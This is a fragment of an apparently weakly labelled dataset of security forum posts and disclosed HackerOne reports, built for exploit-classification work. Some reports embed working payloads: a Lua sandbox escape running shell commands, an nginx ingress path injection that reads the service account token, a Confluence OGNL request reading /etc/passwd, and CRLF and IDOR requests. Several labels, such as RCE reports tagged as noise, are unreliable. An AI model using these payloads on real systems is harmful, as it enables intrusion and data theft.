"weak_cve_metadata_plus_actionability_terms"} -{"id": "bd841e264b73ddf54a6e", "text": "Hey! anyone getting stuck at this question just make sure to use the virtual machine (pwnbox) , just make your for-loop as you know and submit the flag (use all the code). (not all packages are installed at kali so use the docker machine)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-05-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "37811a90e4f1f862c658", "text": "So basically the WIFI UAV App sends 124 Bytes of Data. The 13th, 14th, 89th, 90th, 109th, and 110th byte are about time counter. Where 13 and 14 starts with 00, 89 and 90 starts with 01, and 109 and 110 starts with 02. For controlling, the 21st byte is left and right from 00 to FF where in the middle is 80 ( 126 decimal ) 22nd byte is forward and backward where backward from 00 and forward to FF 23th byte is throttle from 00 to FF 24th byte is for yaw from 00 to FF 25th byte is for command, where 01 takeoff, 02 emergency stop/killswitch, 03 landing, 04 Calibrate Gyro 26th byte is also command but for toggle between Headless mode and non-headless mode There must be many commands but i didnt found yet", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d3654f5191b98a1965b2", "text": "@kkkkkkk some of the target machines are pretty complex, after you spawn the target it may take up to 5 or 10 minutes to actually deploy the docker instance. I know it gives you the IP address right away. But give it time. Some of the WordPress and Session Security exercises seem to take forever to load. These things are not instantaneous. Just give it a few more seconds to load lol. -onthesauce", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-10-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7d82a1bdd00db2a98c0f", "text": "Both Cybersecurity and Artificial Intelligence/Machine Learning are exciting fields with a lot of potential for the future. It really depends on your interests and career goals. If you’re interested in protecting computer systems and networks from cyber attacks, Cybersecurity and digital forensic might be a good fit for you. On the other hand, if you’re interested in developing cutting-edge technology and working on projects like self-driving cars or virtual assistans. AI and machine learning might be a better option.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2023-06-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0a41e2f86f5ae89f3240", "text": "Mate, your post is not in alignment with forum guidelines, why don’t you go ahead and write in detail how your tool works, what is wrong with the target software which allows your tool to work and how exactly you “exploit” it. Also make sure you go through the forum guidelines.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-01-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0eb94d0e648b896f0d0a", "text": "[Cross-site Scripting (XSS) - Stored] XSS Stored on https://seedr.ru\n\nSite: https://seedr.ru/\nOS version: Windows 10\nbrowser: Google chrome\n\nStored cross-site scripting arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. \nI changed my nickname to a code that demonstrates the malicious code of the attacker, now any user, including administrators, will be compromised. When an administrator account is stolen, both the server side and the privacy of users are at risk. Therefore, I consider this vulnerability to be of high severity level.\n\"Groups\" are also vulnerable to XSS stored. I changed the name of the group to demo code. Now everyone who visits my group page is potentially compromised. Accordingly, you can send a link to the group, which will also lead to the compromise of users. (even if the group hasn't been published yet).\nLink:\nhttps://seedr.ru/group/4/614e14e79762b6055d8b4586\n\nHow to prevent XSS attacks\nIn general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:\nFilter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.\nEncode data on output. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.\nUse appropriate response headers. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.\nContent Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.\n\n## Impact\n\nIf an attacker can control the script running in the victim's browser, he can completely compromise that user. In this case, any user who comes to my page will be compromised, and this may be the site administrator, which will jeopardize the security in general. Also, an attacker can take any of the actions applicable to the impact of reflected XSS vulnerabilities.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e68b2003869a04a9aabd", "text": "There are six entries on the list with four different user names. You will be able to exclude two of them without further ado. So there are two possible answers left. If you start at the top, you won’t need a second try", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a4b36c54a62febc43139", "text": "[Information Disclosure] Impact of Using the PHP Function \"phpinfo()\" on System Security - PHP info page disclosure\n\n## Summary:\nphpinfo() is a debug functionality that prints out detailed information on both the system and the PHP configuration.\nThis function can reveal sensitive information such as the exact PHP version, operating system and its version, internal IP addresses, server environment variables, and loaded PHP extensions and their configurations. An attacker can use this information to research known vulnerabilities for the system and potentially exploit other vulnerabilities.\n\n## Steps To Reproduce:\n\n 1. Access the address https://rewardsforjustice.net/phpinfo.php \n\n\n##Remediation Guidance\nTo remediate this issue, you should remove the phpinfo() function from your code, or ensure that it is only accessible to trusted individuals. Additionally, you should ensure that your server environment variables are not accessible to unauthorized users.\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * \"Secure Configuration Guide for PHP\" by the National Institute of Standards and Technology (NIST): https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-42.pdf\n* \"PHP Security Best Practices\" by the Open Web Application Security Project (OWASP): https://www.owasp.org/index.php/PHP_Security_Best_Practices\n* \"PHP Configuration and Hardening\" by the SANS Institute: https://www.sans.edu/security-resources/policies/general/docs/php-configuration-hardening\n\n## Impact\n\nThis information can help an attacker gain more information on the system. After gaining detailed information, the attacker can research known vulnerabilities for that system under review. The attacker can also use this information during the exploitation of other vulnerabilities.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c736a15d82e9ff55e3e0", "text": "Thanks @htbperson The 3rd point is where all of us get stuck. Be sure to make the ipaddress the ip address of “tun0” not anything else.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-12-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a7846ea5442242eb8da2", "text": "[Resource Injection] XSS in Desktop Client in call notification popup\n\n## Summary:\nThe `Nextcloud Desktop Client` application does not properly neutralize the name of a group conversation before using it.\n\n## Steps To Reproduce:\n### Server Machine:\n1. Install the `Nextcloud Server` application\n2. Create an administrator account\n3. Create a user account\n\n### Client Machine:\n4. Install the `Nextcloud Desktop Client` application on a machine that is running the `Windows 10` operating system\n5. Log in to the user account\n\n### Server Machine:\n6. Log in to the administrator account\n7. Install the `Nextcloud Talk` application\n8. Open the `Nextcloud Talk` application\n9. Create a group conversation with the name ``\n10. Add the user to the group conversation\n11. Start a call in the group conversation\n\n### Client Machine:\n12. Observe that the name of the group conversation is treated as `HyperText Markup Language`\n\nPlease do note that group conversation messages are also treated as `HyperText Markup Language`.\n\n## Supporting Material/References:\n{F1953705}\n{F1953706}\n{F1953851}\n\n## Impact\n\nAn attacker can inject arbitrary `HyperText Markup Language` in to the `Nextcloud Desktop Client` application.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8583d4ed7b70bafb9ce0", "text": "[Privilege Escalation] Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token\n\nReport Submission Form\n\n## Summary:\nA user with the permissions to create an ingress resource can obtain the ingress-nginx service account token which can list secrets is all namespaces (cluster wide).\n\n## Kubernetes Version:\n1.20 (should work on (1.21 as well)\n\n## Component Version:\nnginx ingress controller v1.0.4\n\n## Steps To Reproduce:\nI deployed the latest ingress-controller (v1.0.4).\nI used a user (gaf_test) that has the permissions to get, create and update ingress resources\n(the “get” permissions is only to allow kubectl to view the newly created resource).\n\ningress-creator-role.yaml\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n name: ingress-creator\n namespace: default\nrules:\n- apiGroups: [\"networking.k8s.io\"]\n resources: [\"ingresses\"]\n verbs: [\"get\", \"create\", \"update\"]\n```\n\ningress-creator-role-binding.yaml\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n name: gaf_test-ingress-creator-binding\n namespace: default\nsubjects:\n- kind: User\n name: gaf_test\n apiGroup: rbac.authorization.k8s.io\nroleRef:\n kind: Role\n name: ingress-creator\n apiGroup: rbac.authorization.k8s.io\n```\n\nThis user (gaf_user) cannot list secrets at all.\n{F1495367}\n \nUse this user (gaf_user) to create a new ingress resource in the default namespace.\n\ningress.yaml\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: gaf-ingress\n annotations:\n kubernetes.io/ingress.class: \"nginx\"\nspec:\n rules:\n - http:\n paths:\n - path: /gaf{alias /var/run/secrets/kubernetes.io/serviceaccount/;}location ~* ^/aaa\n pathType: Prefix\n backend:\n service:\n name: some-service\n port:\n number: 5678\n```\n```\nkubectl apply -f ingress.yaml\n```\n{F1495369}\n \n\nAccess to nginx ingress loadbalancer to /gaf/token path.\n\nhttps:///gaf/token\n\n {F1495370}\n\nDecode the token to see it belongs to the ingress-nginx\n{F1495372}\n \nThe nginx-ingress service account is bound to the nginx-ingress cluser role that can list secrets in all namespaces.\n\n## The Root Cause\nWhen a user creates an ingress resource, the new configuration is updated in the /etc/nginx/nginx.conf file in the ingress-nginx-controller pod located in the nginx-ingress namespace.\nI caused a “config file injection” using the following payload as path:\n\n**/gaf{alias /var/run/secrets/kubernetes.io/serviceaccount/;}location ~* ^/aaa**\nThe payload above creates the following configuration for nginx:\n\n/etc/nginx/nginx.conf\n\n{F1495371} \n\nThis is the relevant part from the configuration which creates a new route to /gaf path and uses an alias (http://nginx.org/en/docs/http/ngx_http_core_module.html#alias)\nthat maps to /var/run/secrets/kubernetes.io/serviceaccount/ directory on the ingress-nginx-controller pod.\n\n## Impact\n\nA user with the permissions to create an ingress resource can obtain the ingress-nginx service account token which can list secrets is all namespaces (cluster wide).", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9c21340510c93d5d7288", "text": "Something that I found was to go with the hint provided for the first question in the service login. I ran my possible username through Metasploit and got a correct hit on the username. First is that I was able to get the last challenge in under 2 hrs. Use First Name and Last Name only when generating the user list. Use Fist Name and Last Name when generating the Password list and include 1337 When in look at the Netstat and you will see something missing. Never overlook the obvious", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8cb1023c22844b241ca0", "text": "[CRLF Injection] Security bug https://bugzilla.mozilla.org/oauth/authorize - CRLF Header injection via \"redirect_uri\" parameter\n\n## Summary:\nCRLF / HTTP Header Injection.\nAllows you to set any headers/etc (Set-Cookie...)\nPage: https://bugzilla.mozilla.org/oauth/authorize\nParameter: redirect_uri\n\n## Steps To Reproduce:\nPoC - does not require authorization:\n\n1. https://bugzilla.mozilla.org/oauth/authorize?client_id=&redirect_uri=%0d%0axxx:something&response_type=code\n2. or (with true redirect): https://bugzilla.mozilla.org/oauth/authorize?client_id=&redirect_uri=\\\\name.tld%0d%0axxx:something&response_type=code\nHTTP response:\n```\nHTTP/2 302\nserver: nginx\ndate: Tue, 21 Feb 2023 12:04:22 GMT\ncontent-length: 0\ncontent-security-policy: default-src 'self'; worker-src 'none'; connect-src 'self' https://product-details.mozilla.org https://www.google-analytics.com https://treeherder.mozilla.org/api/failurecount/ https://crash-stats.mozilla.org/api/SuperSearch/; font-src 'self' https://fonts.gstatic.com; img-src 'self' data: blob: https://secure.gravatar.com; object-src 'none'; script-src 'self' 'nonce-kYhs2ysp5D5M1gt2i2uKTFaJyxLN8Qm7O112v7Vt6J4dWGrf' 'unsafe-inline' https://www.google-analytics.com; style-src 'self' 'unsafe-inline'; frame-src https://crash-stop-addon.herokuapp.com; frame-ancestors 'self'; form-action 'self' https://www.google.com/search https://github.com/login/oauth/authorize https://github.com/login https://phabricator.services.mozilla.com/ https://people.mozilla.org\nlocation:\nxxx: something?error=invalid_scope\nreferrer-policy: same-origin\nstrict-transport-security: max-age=31536000; includeSubDomains\nstrict-transport-security: max-age=31536000\nx-content-type-options: nosniff\nx-frame-options: SAMEORIGIN\nx-xss-protection: 1; mode=block\nvia: 1.1 google\nalt-svc: h3=\":443\"; ma=2592000,h3-29=\":443\"; ma=2592000\n```\n\n## Impact\n\n## Summary:\nPossible manipulation of user session / open redirect.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4595be3a96fdacee774f", "text": "[Cross-site Scripting (XSS) - Generic] html injection via invite members can be leads account takeover\n\nHi team,\nI have found an vulnerability on your website .\nstep to reproduce :\n1.navigate to : yourworkspace.cloud.mattermost.com\n2.create new channel F1571445\n3.there you will find a functionality invite members F1571448\n4.click on invite members \n5 input your email address \n6.scroll down & click on invite as guest F1571456\n7. on Add to channels input your channel name \n8.click on set a custom message , input this html payloads : click\n\n9. invite \n10.open inbox of email that you have invited\nas you can see html injected & there's an input field & click button \n\nfollow my video poc for better understanding & if you need any info let me know .\nthanks for reading my report .God bless you\n\n## Impact\n\nAs HTML injection worked in email an attacker can trick victim to click on such hyperlinks to redirect him to any malicious site and also can host a XSS page. All this will surely cause some damage to victim. This could lead to users being tricked into giving logins away to malicious attackers.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9bb0b1d18c029c242dd2", "text": "[OS Command Injection] RCE via WikiCloth markdown rendering if the `rubyluabridge` gem is installed\n\n### Summary\n\nOne of the supported wiki formats is `mediawiki` which is rendered by `WikiCloth` via GitLab Markup:\n\nhttps://gitlab.com/gitlab-org/gitlab-markup/-/blob/v1.7.1/lib/github/markups.rb#L24-28\n```ruby\nmarkup(:wikicloth, /mediawiki|wiki/) do |content|\n wikicloth = WikiCloth::WikiCloth.new(:data => content)\n WikiCloth::WikiBuffer::HTMLElement::ESCAPED_TAGS << 'tt'\n wikicloth.to_html(:noedit => true)\nend\n```\n\nOne of the extensions that `WikiCloth` has is for lua (eg [lua.wiki](https://github.com/nricciar/wikicloth/blob/v0.8.1/sample_documents/lua.wiki)), which allows lua code to be run and the results rendered inside of the page by using either `{{#luaexpr:lua expression}}` or `lua code here`. This extension is enabled if the `rubyluabridge` gem can be required:\n\nhttps://github.com/nricciar/wikicloth/blob/v0.8.1/lib/wikicloth/extensions/lua.rb#L1-L6\n```ruby\nbegin\n require 'rubyluabridge'\n DISABLE_LUA = false\nrescue LoadError\n DISABLE_LUA = true\nend\n```\n\nThe lua code is meant to be executed in a sandbox, but looking at the [lua wiki on sandboxing](http://lua-users.org/wiki/SandBoxes#:~:text=loadstring%20--%20UNSAFE.%20See%20load.%20Even%20this%3A) one of the things mentioned is:\n\n> loadstring -- UNSAFE. See load. Even this isn't safe. For example, `pcall(safeloadstring, some_script)` will load some_script in global environment. --SergeyRozhenko\n\n```lua\nlocal oldloadstring = loadstring\nlocal function safeloadstring(s, chunkname)\n local f, message = oldloadstring(s, chunkname)\n if not f then\n return f, message\n end\n setfenv(f, getfenv(2))\n return f\nend\n```\n\nThis is the exact code that `WikiCloth` is using in their wrapper https://github.com/nricciar/wikicloth/blob/master/lib/wikicloth/extensions/lua/luawrapper.lua#L83-L92, so the provided bypass can be used to execute arbitrary lua:\n\n```\n\n_,execute = pcall(loadstring,\n [[\n local command = ...;\n local handle = io.popen(command)\n local result = handle:read(\"*a\")\n handle:close()\n return result;\n ]]\n);\n\nprint(execute('id'));\nexecute('echo vakzz > /tmp/ggg');\n\n```\n\nLuckily it's pretty unlikely that the `rubyluabridge` gem will be installed. There is a current ubuntu package https://packages.ubuntu.com/bionic/ruby/ruby-luabridge that can just be installed with apt, or a rubygem version at https://rubygems.org/gems/Tamar. Potentially another gem could start depending on it, or if gitlab is [installed from source](https://docs.gitlab.com/ee/install/installation.html) and the ruby environment is shared, the apt version could be present.\n\n### Steps to reproduce\n\n1. Install the `rubyluabridge` gem\n * If using the omnibus edition then you will need to do something like the following to get it in the correct spot:\n```\ncurl -sSL https://get.rvm.io | bash\nsource /etc/profile.d/rvm.sh\nrvm install 2.7.4\n\ngit clone https://github.com/neomantra/rubyluabridge\nsudo apt install liblua5.1-0-dev libboost-dev\n./build/extconf_ubuntu.sh\nmake\n\nsudo cp rubyluabridge.so /opt/gitlab/embedded/lib/ruby/2.7.0/rubyluabridge.so\n```\n2. Create a new project and add a wiki page\n3. Clone the wiki (clone url should end in `.wiki.git`)\n4. Create a file `hello.wiki` with the following contents:\n```\n\n_,execute = pcall(loadstring,\n [[\n local command = ...;\n local handle = io.popen(command)\n local result = handle:read(\"*a\")\n handle:close()\n return result;\n ]]\n);\n\nprint(execute('id'));\nexecute('echo vakzz > /tmp/ggg');\n\n```\n5. Add, commit and push the file\n6. Visit the new wiki page on gitlab, you should see the output of the `id` command\n7. See that the file `/tmp/ggg` has been created\n\n{F1515535}\n\n### Impact\nIf the `rubyluabridge` gem has been manually installed, or if another gem starts depending on it, a user with the ability to add wiki pages can run arbitrary commands on the gitlab server \n\n### What is the current *bug* behavior?\nThe lua sandbox can be escaped using code from the o", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9c5641267100399f34d8", "text": "[Insecure Temporary File] Broken Domain Link Takeover from kubernetes.io docs\n\nReport Submission Form\n\n## Summary:\nKubernetes docs have Spanish translation available. One of the pages of the Portuguese doc has an external reference to a website .\nThe website is not registered and can be purchased and used to host malicious content.\n\n## Kubernetes Version:\nNA\n\n## Component Version:\nNA\n## Steps To Reproduce:\n\n1. Go to https://kubernetes.io/pt-br/docs/concepts/cluster-administration/addons/\n2. Search for `contiv`\n3. Click on 'Contiv`\nYou will be redirected to https://contiv.io/ which does not exist...\n\n## Supporting Material/References:\n1. https://contiv.io/\n2. https://in.godaddy.com/domainsearch/find?checkAvail=1&domainToCheck=contiv.io\n\n## Impact\n\nAs an attacker, I can host malicious content on the website.\nI can also, host malicious sdk or softwares, which user will think is part of the deployment docs as its referred in kubernetes.io, this can lead to RCE for users who are referring to this doc.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "38dd1275c2ddac661db1", "text": "Thanks Proper ffuf flags were something that I was missing for long.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-07-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e53d063b645ae1972a02", "text": "Thank you @onthesauce for awesome help. You are nothing short of awesomeness. My two cents to whoever follows this post in search of hints to solve is that try every combinations and dont hesitate to add up your reply for more help. If you happen to use chrome to solve this assessment, solution may not show up on the page even after you had already solved it. As for me chrome was not showing any message from the server like ‘Access Denied’ or ‘File copy errors’ and so on. However, they were visible when I inspected it in the code inspector, went on to network tab and checked in the preview tab. It may be visible to you if you are using mozilla anyways.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9857bd30d9a4789885d1", "text": "[Unknown] Report Regarding Security Vulnerability\n\nHello Team, \n\ni want to report a text injection and a misconfiguration of the 404 page \n\nthe bug exists at :\n\nhttps://www.torproject.org/test/%2f../It%20has%20been%20changed%20by%20a%20new%20one%20https://www.Attacker.com%20so%20go%20to%20the%20new%20one%20since%20this%20one\n\nas you can see attacker text is included\n\"It has been changed by a new one https://www.attacker.com so go to the new one since this one was not found on this server.\"\n\n(Screenshot Attached)\n\nFix : just use a 404 page that don't include attacker text just as :a 404 page that don't include any external text\nhope you fix it\n\nthanks", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e4d8f61c9c40d18efd3f", "text": "[Insecure Direct Object Reference (IDOR)] Possibility to delete files attached to deck cards of other users\n\nHi everyone,\n\nHope you are well ! \n\nI come to report here an IDOR vulnerability on the Deck application of Nextcloud, allowing to delete any attached file(s) on any cards. \n\nNextcloud deck app version : latest stable `1.8.0`\n\n## Steps To Reproduce:\n\nThe Nextcloud Deck application now offers the ability to add an attachment to its own card.\nIf the user deletes the attached attachment, the following POST request is made : \n\n```\nDELETE /apps/deck/cards/63/attachment/file:116 HTTP/2\nHost: redacted\nCookie: oc_sessionPassphrase=1icX1AnixyJWysU9xZCwhaEr%2Bb8TM%2FNvgck%2F1nv216h1fLefCLcWN5Vt%2BgO3%2BXH3wj4Xpo0GW4mLDt52A32%2FVZb4xUZKZq0kgpbIC1InAY8bT1UF4Ef%2BFD7ciOexHI1X; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; oc0xwy77immd=rm2tmgi1rtb2vs9mu7pvcnf4t8; nc_username=Test2; nc_token=6xcZzamP8jrozO48GlKsCTLiIouKgz0P; nc_session_id=rm2tmgi1rtb2vs9mu7pvcnf4t8\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0\nAccept: application/json, text/plain, */*\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nRequesttoken: redacted\nOrigin: redacted\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nX-Pwnfox-Color: green\nTe: trailers\n```\n\nThe `file` parameter does not offer any protection, and we can come and enter the IDs of files that do not belong to us. It is important to leave the ID of your card (63 here for me). You can then change the file ID at will, even if it is attached to another card with a different ID.\n\nSee here the response from the server, after I deleted the file with ID `117`. This file with ID `117` is attached to another user, with its own unshared personal card.\n\n```\nHTTP/2 200 OK\nServer: nginx\nDate: Sun, 30 Oct 2022 16:55:09 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 171\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nPragma: no-cache\nCache-Control: no-cache, no-store, must-revalidate\nX-Request-Id: xRvBeA7No94R5OvXW2Vt\nContent-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';frame-ancestors 'none'\nFeature-Policy: autoplay 'none';camera 'none';fullscreen 'none';geolocation 'none';microphone 'none';payment 'none'\nX-Robots-Tag: none\nReferrer-Policy: no-referrer\nX-Content-Type-Options: nosniff\nX-Xss-Protection: 1; mode=block\nX-Robots-Tag: none\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nStrict-Transport-Security: max-age=31536000; includeSubDomains;\n\n{\"cardId\":63,\"type\":\"file\",\"data\":\"poteau-signalisation-1000mm-o-80mm-orange.jpg\",\"lastModified\":0,\"createdAt\":0,\"createdBy\":null,\"deletedAt\":0,\"extendedData\":[],\"id\":117}\n```\n\nWe are here on an IDOR vulnerability, allowing any authenticated user on a Nextcloud server to delete all files attached to all cards available on the server, including cards to which we do not have access.\n\n## Impact\n\nFrom [OWASP - Broken Access Control](https://owasp.org/www-community/Broken_Access_Control) :\n\n> Many of these flawed access control schemes are not difficult to discover and exploit. Frequently, all that is required is to craft a request for functions or content that should not be granted. Once a flaw is discovered, the consequences of a flawed access control scheme can be devastating. In addition to viewing unauthorized content, an attacker might be able to change or delete content, perform unauthorized functions, or even take over site administration.\n\nNote here that file IDs are incremental, we can easily use a tool like Burp Intruder to fuzz our malicious request and delete file IDs ranging from 1 to 10000 for example, to be sure to impact all users of the server.\n\nLooking forward to exchanging.\n\nRegards,\nSupr4s", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "760d09c6e206ba727247", "text": "[Use of Default Credentials] Default Credentials on Kinetic Core System Console - https://█████/kinetic/app/\n\n**Description:**\nThe Kinetic Core System Console application has weak credentials of **admin/admin**.\n\n## References\n[https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials)\n\n## Impact\n\nPotential attackers could identify technologies being used underneath. This would allow for them to find potential exploits.\nIn addition, the application is disclosing server logs, users in the database with their emails and names, system activity, and much more.\nCheck the uploaded image for additional information.\nThis information should not be available. \nWith addition of sensitive data being shown, this is a serious issue.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\nKinetic Core System Console - 2.1.0-SNAPSHOT\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Browse to the [Login page](https://████/kinetic/app/).\n2. Login using credentials of **admin/admin**.\n3. You should now be logged into an admin account.\n\n## Suggested Mitigation/Remediation Actions\nChange admin's password to something more secure.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "104db6c580545893cf44", "text": "[Server-Side Request Forgery (SSRF)] Blind SSRF in FogBugz project import\n\n### Steps to reproduce\n\n1. Run GitLab `docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest`\n2. Connect to the GitLab Docker container: `docker exec -it gitlab /bin/bash`\n3. Install netcat: `apt update && apt install -y netcat`\n4. Run server in container: `nc -llvp 12345`\n5. Use http://localhost:12345 as FogBugz URL (see screenshot) \n{F602736}\n\n#### Results of GitLab environment info\n\n```\nroot@gitlab:/# gitlab-rake gitlab:env:info\n\nSystem information\nSystem: \nCurrent User: git\nUsing RVM: no\nRuby Version: 2.6.3p62\nGem Version: 2.7.9\nBundler Version:1.17.3\nRake Version: 12.3.2\nRedis Version: 3.2.12\nGit Version: 2.22.0\nSidekiq Version:5.2.7\nGo Version: unknown\n\nGitLab information\nVersion: 12.3.5\nRevision: 2417d5becc7\nDirectory: /opt/gitlab/embedded/service/gitlab-rails\nDB Adapter: PostgreSQL\nDB Version: 10.9\nURL: http://gitlab.example.com\nHTTP Clone URL: http://gitlab.example.com/some-group/some-project.git\nSSH Clone URL: git@gitlab.example.com:some-group/some-project.git\nUsing LDAP: no\nUsing Omniauth: yes\nOmniauth Providers: \n\nGitLab Shell\nVersion: 10.0.0\nRepository storage paths:\n- default: /var/opt/gitlab/git-data/repositories\nGitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell\nGit: /opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\nThe vulnerability allows an attacker to make arbitrary requests inside a GitLab instance's network.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "df2337248408395b1c7a", "text": "[OS Command Injection] RCE on ███████ [CVE-2021-26084]\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\nCVE-2021-26084\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nPOST\n(command cat /etc/passwd)\n```\nPOST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1\nHost: ███\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 915\n\nqueryString=aaaaaaaa\\u0027%2b{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var+isWin+%3d+java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022)%3b+var+cmd+%3d+new+java.lang.String(\\u0022cat 